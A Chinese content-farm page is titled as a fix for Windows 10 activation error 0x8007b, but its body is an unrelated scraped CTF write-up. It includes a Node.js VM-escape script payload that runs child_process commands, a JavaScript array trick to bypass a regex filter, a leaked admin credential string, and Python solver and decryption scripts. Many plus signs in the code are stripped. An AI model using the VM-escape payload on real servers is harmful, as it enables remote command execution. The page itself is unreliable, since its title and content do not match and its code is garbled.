windows10提示0x8007b激活错误,win10激活0x8007b怎么解决

首页 > 数码 > 作者：YD1662024-05-22 06:07:33

读到了，后面构造js的vm逃逸,document.write直接在html里面写，省去外带了

<script> document.write(this.constructor.constructor.constructor.constructor('return process')().mainModule.require('child_process').execSync('/readflag').toString()); </script>

windows10提示0x8007b激活错误,win10激活0x8007b怎么解决(13)

windows10提示0x8007b激活错误,win10激活0x8007b怎么解决(14)

flag{f0425be6-3e46-472a-8879-e19525839caf}

5、Secrets_Of_Admin

源码拿到

admin@e365655e013ce7fdbdbf8f27b418c8fe6dc9354dc4c0328fa02b0ea547659645

登陆

js的数组绕过，这样检测就没有某个元素绕不过正则了，写checksum为crhyyds，提交post时候url编码下

content[]=

得到flag为：flag{65453076-effe-48dc-98d5-d0d235f766f8}

reverse1、**Rev_APC**

生成dll代码

知道了 sha3-256，但是后面并没用上。

核心逻辑:在dll的0x1800015C0函数中，与sys有两种方式通信。

dll的0x1800015C0函数中调用了NtRequestWaitReplyPort，这个sys中有NtReplyWaitReceivePort函数负责接收。sys真正处理数据的函数0x14000298C，算法比较好看懂。
dll中调用DeviceIOControl，对应sys中的函数为0x140003660。

后面就是看算法了。

exp:

from zio import * def fun6(a, b): for i in range(32): c = a[i] if (c >= 33) & (c <= 79): a[i] = (c - 80) & 0xff b[i] = (b[i] a[i])&0xff elif (c >= 81) & (c <= 127): a[i] = c - 48 b[i] ^= (a[i] >> 4) elif (c > 128): a[i] = c - 48 b[i] = (b[i]-a[i])&0xff return a, b def defun6(a, b): for i in range(32): c = a[i] if (c >= 33) & (c <= 79): a[i] = (c - 80) & 0xff b[i] = (b[i]-a[i])&0xff elif (c >= 81) & (c <= 127): a[i] = c - 48 b[i] ^= (a[i] >> 4) elif (c > 128): a[i] = c - 48 b[i] = (b[i] a[i])&0xff return a, b def fun5(a, b): for i in range(32): b[i] ^= a[i] return a, b def fun4(a, b): for i in range(32): a[i] = (a[i] - 80) & 0xff for i in range(16): b[2 * i] ^= (16 * a[2 * i]) & 0xff b[2 * i 1] ^= ((a[2 * i]) >> 4) & 0xf return a, b def fun3(a, b): for i in range(32): b[i] ^= a[i] return a, b def fun2(a, b): for i in range(32): a[i] = (a[i] - 80) & 0xff b[i] ^= ((a[i]>>4)&0xf) | ((a[i]<<4)&0xf0) return a, b def fun1(a, b): for i in range(32): a[i] = (a[i] 16)&0xff b[i] ^= a[i] return a, b def enc(): b = [ord(c) for c in 'flag{12345678901234567890123456}'] #b = [91, 36, 164, 45, 64, 21, 144, 29, 194, 5, 189, 39, 240, 29, 80, 137, 178, 73, 216, 105, 177, 245, 80, 59, 99, 154, 94, 170, 79, 175, 153, 126] ''' a3 = '9d5f741799d7e62274f01963516316d2eb6888b737bab0a2b0e1774e3b7389e5'.decode('hex') a2 = [0xA5, 0xCF, 0xCD, 0xD6, 0xC5, 0xC3, 0xB1, 0xC5, 0xD2, 0xD9, 0xD7, 0xC7, 0xD6, 0xCD, 0xD4, 0xD8, 0xC3, 0xBB, 0xCD, 0xD8, 0xCC, 0xC3, 0xB0, 0xC5, 0xD8, 0xC9, 0xDC] a4 = [] for i in range(32): a4.append(ord(a3[i])^a2[i%len(a2)]) ''' a = [] a2 = [0xA5, 0xCF, 0xCD, 0xD6, 0xC5, 0xC3, 0xB1, 0xC5, 0xD2, 0xD9, 0xD7, 0xC7, 0xD6, 0xCD, 0xD4, 0xD8, 0xC3, 0xBB, 0xCD, 0xD8, 0xCC, 0xC3, 0xB0, 0xC5, 0xD8, 0xC9, 0xDC, 0, 0, 0, 0, 0] for i in range(32): c = 0 for j in range(i 1): c ^= a2[j] a.append(c) orders = [0, 5, 5, 2, 2, 3, 4, 4, 3, 2, 0, 3, 0, 3, 2, 1, 5, 1, 3, 1, 5, 5, 2, 4, 0, 0, 4, 5, 4, 4, 5, 5][::-1] print '----------' for i in range(32): print a,',' if orders[i] == 0: fun1(a, b) elif orders[i] == 1: fun2(a, b) elif orders[i] == 2: fun3(a, b) elif orders[i] == 3: fun4(a, b) elif orders[i] == 4: fun5(a, b) elif orders[i] == 5: fun6(a, b) print '----------' print (b) def get_aas2(orders): b = [ord(c) for c in 'flag{12345678901234567890123456}'] a = [] a3 = '9d5f741799d7e62274f01963516316d2eb6888b737bab0a2b0e1774e3b7389e5'.decode('hex') a2 = [0xA5, 0xCF, 0xCD, 0xD6, 0xC5, 0xC3, 0xB1, 0xC5, 0xD2, 0xD9, 0xD7, 0xC7, 0xD6, 0xCD, 0xD4, 0xD8, 0xC3, 0xBB, 0xCD, 0xD8, 0xCC, 0xC3, 0xB0, 0xC5, 0xD8, 0xC9, 0xDC] a4 = [] for i in range(32): a4.append(ord(a3[i])^a2[i%len(a2)]) for i in range(32): c = 0 for j in range(i 1): c ^= a4[j] a.append(c) aas = [] for i in range(32): aas.append(a[:]) if orders[i] == 0: fun1(a, b) elif orders[i] == 1: fun2(a, b) elif orders[i] == 2: fun3(a, b) elif orders[i] == 3: fun4(a, b) elif orders[i] == 4: fun5(a, b) elif orders[i] == 5: fun6(a, b) return aas def get_aas(orders): b = [ord(c) for c in 'flag{12345678901234567890123456}'] a = [] a2 = [0xA5, 0xCF, 0xCD, 0xD6, 0xC5, 0xC3, 0xB1, 0xC5, 0xD2, 0xD9, 0xD7, 0xC7, 0xD6, 0xCD, 0xD4, 0xD8, 0xC3, 0xBB, 0xCD, 0xD8, 0xCC, 0xC3, 0xB0, 0xC5, 0xD8, 0xC9, 0xDC, 0, 0, 0, 0, 0] for i in range(32): c = 0 for j in range(i 1): c ^= a2[j] a.append(c) aas = [] for i in range(32): aas.append(a[:]) if orders[i] == 0: fun1(a, b) elif orders[i] == 1: fun2(a, b) elif orders[i] == 2: fun3(a, b) elif orders[i] == 3: fun4(a, b) elif orders[i] == 4: fun5(a, b) elif orders[i] == 5: fun6(a, b) return aas def dec(aas, orders, seed): #b = [101, 46, 7, 63, 148, 47, 164, 57, 127, 160, 41, 36, 28, 175, 229, 120, 228, 102, 147, 78, 254, 68, 207, 240, 223, 246, 251, 73, 235, 24, 215, 30] #b = [132, 13, 239, 89, 97, 68, 214, 77, 139, 199, 61, 244, 220, 107, 175, 6, 222, 75, 100, 91, 167, 143, 135, 74, 72, 246, 81, 54, 83, 64, 165, 216] bs = l64(0x2F34A83A1B38C557) l64(0xEE8F2F04E4C69739) l64(0x486FC9246780515E) l64(0xEBC2C2B0C7BD7F5B) b = [ord(i) for i in bs] re_orders = orders[::-1] for i in range(32): a = aas[31-i] if re_orders[i] == 0: fun1(a, b) elif re_orders[i] == 1: fun2(a, b) elif re_orders[i] == 2: fun3(a, b) elif re_orders[i] == 3: fun4(a, b) elif re_orders[i] == 4: fun5(a, b) elif re_orders[i] == 5: defun6(a, b) #print b s = ''.join(chr(i) for i in b) is_printable = True for i in range(10): if b[i] > 0x80: is_printable = False break if is_printable: print seed, s return is_printable def srand(s): global seed seed = s # microsoft c runtime implementation def rand(): global seed seed = (seed * 214013 2531011) % 2**64 return (seed >> 16)&0x7fff def gen_order(seed=1): srand(seed) orders = [] for i in range(32): orders.append(rand() % 6) return orders orders = gen_order(seed=1) aas = get_aas(orders) dec(aas, orders, 1)

flag{Kmode_Umode_Communication!}

2、**勒索解密**

分析的程序主要逻辑为先计算出固定秘钥时间戳结合生成的key进行sha256，再以此作为key将生成将.bmp文件内容进行aes加密，加密iv为0

windows10提示0x8007b激活错误,win10激活0x8007b怎么解决(15)

代码如下：

#coding:utf-8 import base64 from hashlib import * from Crypto.Cipher import AES def decrypt(data, key): cryptos = AES.new(key, AES.MODE_ECB) decrpytBytes = list(base64.b64decode(data)) decrpytBytes = bytes(decrpytBytes) data = cryptos.decrypt(decrpytBytes) return data key = "f4b6bb19108b56fc60a61fc967c0afbe71d2d9048ac0ffe931c901e75689eb46"[:32] key = bytes.fromhex(key) f1 = open("flag.bmp.ctf_crypter", "rb") f2 = open("flag.bmp", "wb") data = f1.read() def xor(enc, data): res = [] for i in range(len(a)): res = [enc[i]^data[i]] return bytes(res) for i in range(len(data)//16): enc = base64.b64encode(data[16*i:16*(i 1)]) if i > 0: ans = xor(decrypt(enc, key), data[16*(i-1):16*i]) else: ans = decrypt(enc, key) fp2.write(ans) f1.close() f2.close()

解密得到flag如下：

windows10提示0x8007b激活错误,win10激活0x8007b怎么解决(16)

上一页 1 2 345 下一页

栏目热文

win10激活出现0x80072ee2错误（win10专业版激活时显示0x8007232b）
阅读全文>>2024-05-22 06:17:44
激活win10出现0x8007007d怎么办（win10激活0x8007b怎么解决）
阅读全文>>2024-05-22 06:08:36
win10激活错误代码0x800705b4（win10无法激活错误代码0x800704cf）
阅读全文>>2024-05-22 05:54:26
教资认证常见问题（教资认证需要重新注册吗）
阅读全文>>2024-05-22 06:13:10
教资为什么需要认证（教资认证通过了是啥样的）
阅读全文>>2024-05-22 06:15:19

文档排行

本站推荐

喋血孤岛女特工用美人计（五大女特工抗日谍战片）
阅读全文>>2024-04-16 16:35:16
少年派林妙妙是哪集出现的（少年派林妙妙最后一集被救）
阅读全文>>2024-03-28 02:55:41
新上门女婿田冲结局啥样
阅读全文>>2023-07-09 01:06:27
敷完面膜的后续步骤（敷面膜的完整流程）
阅读全文>>2022-11-26 22:16:43
2月七号是农历多少（二月七日农历是多少）
阅读全文>>2023-05-26 11:12:23
繁殖红绿灯鱼的步骤（红绿灯鱼繁殖正确方法视频）
阅读全文>>2024-01-26 13:09:17

Copyright © 2018 - 2021 www.yd166.com., All Rights Reserved.